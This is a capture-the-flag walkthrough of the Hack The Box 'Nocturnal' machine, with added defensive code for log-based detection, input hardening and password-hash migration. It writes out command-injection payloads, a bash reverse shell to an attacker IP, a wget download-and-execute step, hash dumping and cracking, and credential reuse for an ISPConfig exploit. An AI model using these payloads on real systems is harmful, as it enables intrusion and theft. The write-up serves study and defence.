Nocturnal - Hack The Box Machine

May 2025

User Flag

Navigating through the website and intercepting some requests, I found view.php. It takes a username in the query string, so I tried viewing other users' files, such as admin's. Instead of the User not found error, it returned the page with no files, which means the user exists but has no files. Knowing this, I used the rockyou wordlist to fuzz usernames:

ffuf -w ~/wordlists/passwords/rockyou.txt -u "http://nocturnal.htb/view.php?username=FUZZ&file=a.pdf" -H "Cookie: PHPSESSID=hva38rh98rll8q07g4k244f7j4"

With this fuzzing command every request came back with a 200 response code, so I filtered by response size with the flag -fs 2985 (the size of the "no files" page) and got some matches for usernames that had files:

amanda                  [Status: 200, Size: 3355, Words: 1178, Lines: 129]
frank                   [Status: 200, Size: 3037, Words: 1174, Lines: 129]
tobias                  [Status: 200, Size: 3037, Words: 1174, Lines: 129]
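The response-size difference above is a username oracle: a nonexistent user gets User not found, an existing user with no files gets the 2985-byte page. As an added example (not part of the original write-up), here is a small Python detector for this kind of enumeration run over constructed Apache access-log lines: it flags a client that requests view.php with many distinct usernames inside a short window. The log lines, the threshold and the function names are my own; only the parameter name and the response sizes come from the write-up.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlparse

# Constructed Apache combined-format log lines (not taken from the machine).
# One client walks view.php with many different usernames in a few seconds;
# a second client views one user's files twice, which is normal use.
SAMPLE_LOG = """\
10.10.16.88 - - [01/May/2025:12:00:01 +0000] "GET /view.php?username=amanda&file=a.pdf HTTP/1.1" 200 3355 "-" "Fuzz Faster U Fool v2.1.0"
10.10.16.88 - - [01/May/2025:12:00:01 +0000] "GET /view.php?username=123456&file=a.pdf HTTP/1.1" 200 2985 "-" "Fuzz Faster U Fool v2.1.0"
10.10.16.88 - - [01/May/2025:12:00:02 +0000] "GET /view.php?username=password&file=a.pdf HTTP/1.1" 200 2985 "-" "Fuzz Faster U Fool v2.1.0"
10.10.16.88 - - [01/May/2025:12:00:02 +0000] "GET /view.php?username=admin&file=a.pdf HTTP/1.1" 200 2985 "-" "Fuzz Faster U Fool v2.1.0"
10.10.16.88 - - [01/May/2025:12:00:03 +0000] "GET /view.php?username=frank&file=a.pdf HTTP/1.1" 200 3037 "-" "Fuzz Faster U Fool v2.1.0"
10.10.16.88 - - [01/May/2025:12:00:03 +0000] "GET /view.php?username=tobias&file=a.pdf HTTP/1.1" 200 3037 "-" "Fuzz Faster U Fool v2.1.0"
10.10.16.88 - - [01/May/2025:12:00:04 +0000] "GET /index.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
192.168.1.20 - - [01/May/2025:12:05:00 +0000] "GET /view.php?username=frank&file=report.pdf HTTP/1.1" 200 3037 "-" "Mozilla/5.0"
192.168.1.20 - - [01/May/2025:12:05:09 +0000] "GET /view.php?username=frank&file=notes.pdf HTTP/1.1" 200 3037 "-" "Mozilla/5.0"
"""

# client, timestamp, method, request target, status, size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')


def detect_enumeration(log_text, threshold=5, window=timedelta(minutes=1)):
    """Return {client_ip: sorted usernames} for every client that requested
    view.php with at least `threshold` distinct usernames inside any
    `window`-long span. Anything else is treated as normal browsing."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, _method, target, _status, _size = m.groups()
        url = urlparse(target)
        if url.path != "/view.php":
            continue
        users = parse_qs(url.query).get("username")
        if not users:
            continue
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        per_ip[ip].append((when, users[0]))

    findings = {}
    for ip, events in per_ip.items():
        events.sort()
        in_window = defaultdict(int)  # username -> hits inside the sliding window
        start = 0
        for when, user in events:
            in_window[user] += 1
            # drop events that fell out of the window
            while when - events[start][0] > window:
                old_user = events[start][1]
                in_window[old_user] -= 1
                if in_window[old_user] == 0:
                    del in_window[old_user]
                start += 1
            if len(in_window) >= threshold:
                findings[ip] = sorted({u for _, u in events})
                break
    return findings


if __name__ == "__main__":
    for ip, users in detect_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: {len(users)} distinct usernames probed -> {users}")
```

The detector is a symptom check; the root cause is that view.php answers differently for a missing user and for an existing user with no files, so the fix on the application side is to return the same page in both cases.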

The first user, amanda, had a file called privacy.odt with these contents:

Dear Amanda,
Nocturnal has set the following temporary password for you: arHkG7HAI68X8s1J. This password has been set for all our services, so it is essential that you change it on your first login to ensure the security of your account and our infrastructure.
The file has been created and provided by Nocturnal's IT team. If you have any questions or need additional assistance during the password change process, please do not hesitate to contact us.
Remember that maintaining the security of your credentials is paramount to protecting your information and that of the company. We appreciate your prompt attention to this matter.

Yours sincerely,
Nocturnal's IT team

So we now know amanda's password is arHkG7HAI68X8s1J and can use it to log in to the website.

This user is an admin on the website, so we now have access to the admin panel. One of the panel's parameters is passed to a shell, so I sent the following payload, which uses newlines (%0a) as command separators and tabs (%09) in place of spaces:

a%0abash%09-c%09"id"%0a

We get:

sh: 3: backups/backup_2025-05-01.zip: Permission denied
uid=33(www-data) gid=33(www-data) groups=33(www-data)
To get an interactive shell, I created a rev.sh containing a reverse shell back to my host:

#!/bin/bash
bash -c 'bash -i >& /dev/tcp/10.10.16.88/4444 0>&1'

It is served over HTTP on port 8888, then downloaded and executed through the same injection:

a%0abash%09-c%09"wget%09http://10.10.16.88:8888/rev.sh"%0a
a%0abash%09-c%09"bash%09rev.sh"%0a
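The injection works because a filter on the obvious separators does nothing about newlines and tabs once the value is interpolated into a shell command line. The following is an added example, not code from the machine or from the write-up: the vulnerable pattern (a denylist of a few characters, then string interpolation into a shell command) next to a hardened version that allow-lists the value and passes an argv list with no shell. The shape of the original PHP code, the denylist and the zip command line are assumptions; the payload is the one above, URL-decoded.

```python
import re
import subprocess
from urllib.parse import unquote

# The payload from the write-up, URL-decoded: %0a becomes a newline (a command
# separator for sh) and %09 a tab (whitespace between arguments).
PAYLOAD = unquote('a%0abash%09-c%09"id"%0a')

# Assumed shape of the original bug (the machine's PHP source is not on the
# page): a denylist of a few separator characters, then interpolation into a
# shell command line. Newline and tab are not in the list.
DENYLIST = set(" ;&|`$")


def build_backup_command_unsafe(password):
    """Vulnerable pattern: denylist filtering, then a shell string.
    This only builds the string; nothing here executes it."""
    filtered = "".join(ch for ch in password if ch not in DENYLIST)
    return f"zip -r -P {filtered} backups/backup.zip ."


# Hardened replacement: allow-list the value and pass an argv list (no shell).
PASSWORD_RE = re.compile(r"[A-Za-z0-9!@#%^*_+=.,:?-]{8,64}")


def is_safe_backup_password(password):
    """True only for 8-64 characters from a fixed printable set.
    fullmatch() rejects a trailing newline, which a '$' anchor would accept."""
    return PASSWORD_RE.fullmatch(password) is not None


def validate_backup_password(password):
    if not is_safe_backup_password(password):
        raise ValueError("backup password contains disallowed characters or bad length")
    return password


def build_backup_argv(password, archive="backups/backup.zip"):
    """argv list for subprocess: every element is one literal argument, so no
    character in the password is ever parsed as shell syntax."""
    return ["zip", "-r", "-P", validate_backup_password(password), archive, "."]


def run_backup(password, archive="backups/backup.zip", runner=subprocess.run):
    """`runner` is injectable so the call can be checked without zip installed."""
    return runner(build_backup_argv(password, archive), shell=False, check=True,
                  capture_output=True)


if __name__ == "__main__":
    print(repr(build_backup_command_unsafe(PAYLOAD)))  # payload survives the denylist intact
    print(is_safe_backup_password(PAYLOAD))            # False: rejected before any command is built
    print(build_backup_argv("Sl0w-motion.pw"))
```

Two layers matter here: the allow-list stops the payload at validation time, and even if validation were missing, an argv list hands the value to zip as a single argument instead of to sh for parsing.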
In the resulting www-data shell, the application's SQLite database holds a users table with password hashes:

www-data@nocturnal:~$ cd nocturnal_database
cd nocturnal_database
www-data@nocturnal:~/nocturnal_database$ ls
ls
nocturnal_database.db
www-data@nocturnal:~/nocturnal_database$ ls -la
ls -la
total 28
drwxr-xr-x 2 www-data  www-data   4096 May  1 11:41 .
drwxr-xr-x 6 ispconfig ispconfig  4096 Apr 14 09:26 ..
-rw-rw-r-- 1 www-data  www-data  20480 May  1 11:41 nocturnal_database.db
www-data@nocturnal:~/nocturnal_database$ sqlite3 nocturnal_database.db
sqlite3 nocturnal_database.db
.tables
uploads  users
select * from users;
1|admin|d725aeba143f575736b07e045d8ceebb
2|amanda|df8b20aa0c935023f99ea58358fb63c4
4|tobias|55c82b1ccd55ab219b3b109b07d5061d

Running hashcat against the tobias user's hash, we get:

55c82b1ccd55ab219b3b109b07d5061d:slowmotionapocalypse

With this password, we can SSH into the machine as tobias and get the user flag.
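Each row of the dumped users table stores a single 32-hex-character value with no salt, which is consistent with unsalted MD5 (an inference from the dump, not something the write-up states) and explains why one hashcat run recovered tobias's password. As an added example, not code from the machine, here is how a login handler can keep verifying such legacy rows while transparently rehashing them with salted PBKDF2-HMAC-SHA256 on the next successful login. The function names, the storage format and the 600,000-iteration work factor are my choices.

```python
import hashlib
import hmac
import os
import re

LEGACY_MD5_RE = re.compile(r"[0-9a-f]{32}")
ITERATIONS = 600_000  # PBKDF2-HMAC-SHA256 work factor chosen for this example


def looks_like_unsalted_md5(stored):
    """32 lowercase hex characters and nothing else, as in the dumped users table."""
    return LEGACY_MD5_RE.fullmatch(stored) is not None


def legacy_md5_hash(password):
    """The legacy scheme: unsalted MD5 hex digest. Kept only to verify old rows."""
    return hashlib.md5(password.encode(), usedforsecurity=False).hexdigest()


def pbkdf2_hash(password, salt=None):
    """Salted, iterated hash in a self-describing format: algo$iters$salt$dk."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify(password, stored):
    """Constant-time comparison for both the legacy and the new format."""
    if looks_like_unsalted_md5(stored):
        return hmac.compare_digest(legacy_md5_hash(password), stored)
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError(f"unsupported hash format: {algo}")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def verify_and_upgrade(password, stored):
    """Login-time migration: on a correct password against a legacy MD5 row,
    return the new PBKDF2 string to store in its place. Returns (ok, stored_value)."""
    ok = verify(password, stored)
    if ok and looks_like_unsalted_md5(stored):
        return True, pbkdf2_hash(password)
    return ok, stored


if __name__ == "__main__":
    # Constructed legacy row: what a users entry looks like before migration.
    legacy_row = legacy_md5_hash("constructed-example-password")
    ok, migrated = verify_and_upgrade("constructed-example-password", legacy_row)
    print(ok, migrated)
```

A dump taken after the migration yields per-row salts and a slow hash, so a wordlist attack like the one that recovered slowmotionapocalypse has to be repeated per user at a fraction of the speed.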

Root flag

Port 8080 is also open and serves ISPConfig.

The ISPConfig version is 3.2, which is affected by CVE-2023-46818.

After trying the known usernames and passwords in different combinations, a login with admin and slowmotionapocalypse was successful (password reuse).

Running the exploit with these credentials gives us a root shell, from which we can simply cat /root/root.txt and get the final flag.